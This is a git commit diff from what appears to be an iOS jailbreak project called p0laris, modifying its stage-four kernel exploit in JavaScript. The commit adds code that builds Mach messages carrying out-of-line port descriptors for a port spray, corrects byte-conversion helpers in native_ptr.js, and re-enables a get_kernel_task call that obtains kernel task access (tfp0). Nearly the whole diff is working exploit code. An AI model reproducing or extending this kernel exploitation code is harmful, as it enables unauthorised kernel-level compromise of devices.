native_ptr w00t

author: spv420 <spv@spv.sh> 2022-08-01 01:10:25 -0400
committer: spv420 <spv@spv.sh> 2022-08-01 01:10:25 -0400
commit: 0df8ea8b4bb9d9ee9d45a56eb5df2c2c6a23127c (patch)
tree: ae0643c4bb134b8ab721de846e7197145fe1933e /src
parent: 9d184c28ecd7ee3080145df9034217ff7443ef8b (diff)
3 files changed, 97 insertions, 82 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index e761184..68ed794 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -221,7 +221,7 @@ function spray_ports(number_port_descs) {
 
 	ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
 
-//	p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
+	p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
 
 	var ret = read_u32(mp);
 	shit_heap_free(mp);
@@ -250,6 +250,7 @@ function fast_array_mul(arr, n) {
 }
 
 function send_ports(target, payload, num, number_port_descs) {
+	if (0) {
 	var init_port_set = shit_heap(num * 4);
 
 	for (var i = 0; i < num; i++) {
@@ -281,8 +282,30 @@ function send_ports(target, payload, num, number_port_descs) {
 	large_buf[req_head_msgh_id >>> 2] = 1337;
 
 //	p0laris_log("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100)));
+}
+
+	var init_port_set = new mach_port_t(num);
+
+	var InP = new Request_sp(number_port_descs);
+	var InP_obj = InP.deref();
+	InP_obj.msgh_body.msgh_descriptor_count = number_port_descs;
+
+	for (var i = 0; i < number_port_descs; i++) {
+		InP_obj.init_port_set[i].address = init_port_set.addy;
+		InP_obj.init_port_set[i].count = num;
+		InP_obj.init_port_set[i].disposition = 19;
+		InP_obj.init_port_set[i].deallocate = false;
+		InP_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+	}
+
+	InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+	InP_obj.Head.msgh_remote_port = target;
+	InP_obj.Head.msgh_local_port = 0;
+	InP_obj.Head.msgh_id = 1337;
+
+	InP.write(InP_obj);
 	
-	var ret = mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+	var ret = mach_msg(InP.addy, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
 
 	return ret;
 }
diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js
index 464d865..3741e80 100644
--- a/src/stage4/lib/native_ptr.js
+++ b/src/stage4/lib/native_ptr.js
@@ -33,7 +33,6 @@ class native_ptr {
 
 		if (Object.getPrototypeOf(this).deref_all != undefined) {
 			this.size *= this.count;
-			p0laris_log("get lucky %d", this.size);
 		}
 
 		if (this.addy === undefined) {
@@ -197,34 +196,27 @@ function mach_msg_header_t_obj_to_buf(obj) {
 function mach_msg_body_t_buf_to_obj(buf) {
 	var ret = {};
 
-	ret.msgh_descriptor_count = u32_to_u8x4(buf);
+	ret.msgh_descriptor_count = u8x4_to_u32(buf);
 
 	return ret;
 }
 
 function mach_msg_body_t_obj_to_buf(obj) {
-	var ret = u8x4_to_u32(obj.msgh_descriptor_count);
+	var ret = u32_to_u8x4(obj.msgh_descriptor_count);
 
 	return ret;
 }
 
 function Request_sp_buf_to_obj(buf) {
 	var ret = {};
-	p0laris_log("w00t %d %s", buf.length, Object.getOwnPropertyNames(Object.getPrototypeOf(buf)).toString());
 	var Head_buf = buf.subarray(0, 24);
-	p0laris_log("w00t");
 	var msgh_body_buf = buf.subarray(24, 28);
-	p0laris_log("w00t");
 	var init_port_set_buf = buf.subarray(28);
-	p0laris_log("w00t");
 	ret.Head = mach_msg_header_t_buf_to_obj(Head_buf);
-	p0laris_log("w00t");
 	ret.msgh_body = mach_msg_body_t_buf_to_obj(msgh_body_buf);
-	p0laris_log("w00t");
 	ret.init_port_set = new Array();
 	
 	for (var i = 0; i < (buf.length - 28) / 28; i++) {
-		p0laris_log("%d", i);
 		var init_port_set_buf = buf.subarray((i * 28) + 28);
 		ret.init_port_set.push(mach_msg_ool_ports_descriptor_t_buf_to_obj(init_port_set_buf));
 	}
@@ -236,7 +228,6 @@ function Request_sp_obj_to_buf(obj) {
 	var ret = new Uint8Array(this.size * this.count);
 	var tmp = mach_msg_header_t_obj_to_buf(obj.Head);
 	var begin = 0;
-	p0laris_log("w00t");
 	var i = 0;
 
 	begin = i;
@@ -245,7 +236,6 @@ function Request_sp_obj_to_buf(obj) {
 		ret[i] = tmp[i - begin];
 	}
 
-	p0laris_log("w00t");
 	begin = i;
 
 	var tmp = mach_msg_body_t_obj_to_buf(obj.msgh_body);
@@ -254,7 +244,6 @@ function Request_sp_obj_to_buf(obj) {
 		ret[i] = tmp[i - begin];
 	}
 
-	p0laris_log("w00t");
 	begin = i;
 
 	for (var i = 0; i < obj.init_port_set.length; i++) {
@@ -263,7 +252,6 @@ function Request_sp_obj_to_buf(obj) {
 			ret[begin + (i * 12) + j] = tmp[j];
 		}
 	}
-	p0laris_log("w00t");
 	return ret;
 }
 
@@ -279,4 +267,6 @@ var mach_msg_ool_ports_descriptor_t = native_ptr_type(12,
 var Request_sp = native_ptr_type(24 + 4 + 12,
 	Request_sp_buf_to_obj,
 	Request_sp_obj_to_buf);
-Request_sp.prototype.deref_all = true;
-\ No newline at end of file
+Request_sp.prototype.deref_all = true;
+
+var mach_port_t = native_ptr_type(4);
+\ No newline at end of file
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 541dc44..6d14de1 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -55,74 +55,76 @@ function main() {
 	sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
 	prep_shit();
 
-	var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
-	var addy = init_port_set.addy;
-	var init_port_set_obj = init_port_set.deref();
-	init_port_set_obj.address = 0x41414141;
-	init_port_set_obj.count = 0x42424242;
-	init_port_set_obj.disposition = 19;
-	init_port_set_obj.deallocate = false;
-	init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
-	init_port_set.write(init_port_set_obj, 0);
-	init_port_set.write(init_port_set_obj, 1);
-	init_port_set.write(init_port_set_obj, 2);
-	init_port_set.write(init_port_set_obj, 3);
-	p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
-							   JSON.stringify(init_port_set.deref(1)),
-							   JSON.stringify(init_port_set.deref(2)),
-							   JSON.stringify(init_port_set.deref(3)));
-	
-	var Head = new mach_msg_header_t();
-	var addy = Head.addy;
-	var Head_obj = Head.deref();
-	Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
-	Head_obj.msgh_remote_port = 0x41424344;
-	Head_obj.msgh_local_port = 0x45464748;
-	Head_obj.msgh_id = 1337;
-	Head.write(Head_obj);
-	p0laris_log("%s", JSON.stringify(Head.deref()));
-
-	p0laris_log("here");
-
-	var req = new Request_sp(4);
-	p0laris_log("here");
-	var addy = req.addy;
-	p0laris_log("here");
-	var req_obj = req.deref();
-	p0laris_log("here");
-
-	req_obj.msgh_body.msgh_descriptor_count = 4;
-	p0laris_log("here");
-	for (var i = 0; i < 4; i++) {
-		req_obj.init_port_set[i].address = 0x1234;
-		req_obj.init_port_set[i].count = 0x1235;
-		req_obj.init_port_set[i].disposition = 19;
-		req_obj.init_port_set[i].deallocate = false;
-		req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
-	}
-
-	p0laris_log("here");
-	req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
-	p0laris_log("here");
-	req_obj.Head.msgh_remote_port = 0x41424344;
-	p0laris_log("here");
-	req_obj.Head.msgh_local_port = 0x45464748;
-	p0laris_log("here");
-	req_obj.Head.msgh_id = 1337;
-
-	p0laris_log("here");
-	req.write(req_obj);
-	p0laris_log("here");
-	p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
-		if (typeof value === 'number') {
-			return "0x" + value.toString(16);
+	if (0) {
+		var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
+		var addy = init_port_set.addy;
+		var init_port_set_obj = init_port_set.deref();
+		init_port_set_obj.address = 0x41414141;
+		init_port_set_obj.count = 0x42424242;
+		init_port_set_obj.disposition = 19;
+		init_port_set_obj.deallocate = false;
+		init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+		init_port_set.write(init_port_set_obj, 0);
+		init_port_set.write(init_port_set_obj, 1);
+		init_port_set.write(init_port_set_obj, 2);
+		init_port_set.write(init_port_set_obj, 3);
+		p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
+								   JSON.stringify(init_port_set.deref(1)),
+								   JSON.stringify(init_port_set.deref(2)),
+								   JSON.stringify(init_port_set.deref(3)));
+		
+		var Head = new mach_msg_header_t();
+		var addy = Head.addy;
+		var Head_obj = Head.deref();
+		Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+		Head_obj.msgh_remote_port = 0x41424344;
+		Head_obj.msgh_local_port = 0x45464748;
+		Head_obj.msgh_id = 1337;
+		Head.write(Head_obj);
+		p0laris_log("%s", JSON.stringify(Head.deref()));
+
+		p0laris_log("here");
+
+		var req = new Request_sp(4);
+		p0laris_log("here");
+		var addy = req.addy;
+		p0laris_log("here");
+		var req_obj = req.deref();
+		p0laris_log("here");
+
+		req_obj.msgh_body.msgh_descriptor_count = 4;
+		p0laris_log("here");
+		for (var i = 0; i < 4; i++) {
+			req_obj.init_port_set[i].address = 0x1234;
+			req_obj.init_port_set[i].count = 0x1235;
+			req_obj.init_port_set[i].disposition = 19;
+			req_obj.init_port_set[i].deallocate = false;
+			req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
 		}
 
-		return value;
-	}, "\t"));
-	p0laris_log("here");
+		p0laris_log("here");
+		req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+		p0laris_log("here");
+		req_obj.Head.msgh_remote_port = 0x41424344;
+		p0laris_log("here");
+		req_obj.Head.msgh_local_port = 0x45464748;
+		p0laris_log("here");
+		req_obj.Head.msgh_id = 1337;
+
+		p0laris_log("here");
+		req.write(req_obj);
+		p0laris_log("here");
+		p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
+			if (typeof value === 'number') {
+				return "0x" + value.toString(16);
+			}
+
+			return value;
+		}, "\t"));
+		p0laris_log("here");
+	}
 
-//	var tfp0 = get_kernel_task();
+	var tfp0 = get_kernel_task();
 
 	syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
 	return 0;
author	spv420 <spv@spv.sh>	2022-08-01 01:10:25 -0400
committer	spv420 <spv@spv.sh>	2022-08-01 01:10:25 -0400
commit	0df8ea8b4bb9d9ee9d45a56eb5df2c2c6a23127c (patch)
tree	ae0643c4bb134b8ab721de846e7197145fe1933e /src
parent	9d184c28ecd7ee3080145df9034217ff7443ef8b (diff)